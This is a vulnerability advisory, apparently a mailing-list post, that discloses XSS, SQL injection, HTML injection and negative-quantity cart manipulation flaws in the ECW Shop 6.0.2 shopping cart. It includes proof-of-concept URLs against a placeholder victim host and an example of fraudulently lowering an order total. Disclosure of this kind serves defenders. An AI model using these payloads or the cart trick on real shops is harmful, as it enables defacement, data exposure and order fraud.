Hello All, I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2 Authors Site: http://www.soft4e.com/ ECW Shop is described by its authors as: ECW-Shop - simple for use featured shopping cart with ability to use Excel or Access format for database. +-[Examples:]--------------------------------------------------+ [1]------------------------------------------------------------+ XSS: (This same problem was reported on version 5.5 by David S. Ferreira - http://www.securityfocus.com/bid/9244) http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=> [2]------------------------------------------------------------+ Information Disclosure & Possible SQL Injection: http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min='&max=1 http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=' Error: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/search.php on line 109 [3]------------------------------------------------------------+ HTML Injection: http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=>

DEFACED!

http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i d=754ce025144839c2abe369c36d90d8e9&key=&ctg=

DEFACED!

&comp=&min=1&ma x=1 [4]------------------------------------------------------------+ Cart/Order Manipulation: You can add negative quanity value items to your cart to gain credit. Example: Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of £6.99 Cart Total: £2.00 +-[Notes:]-----------------------------------------------------+ Vulnerabilities found on: 06/08/2005 Author(s) Informed on: 06/08/2005 Author(s) Response: NONE Author(s) Fix: NONE JohnC@NoBytes.com http://www.NoBytes.com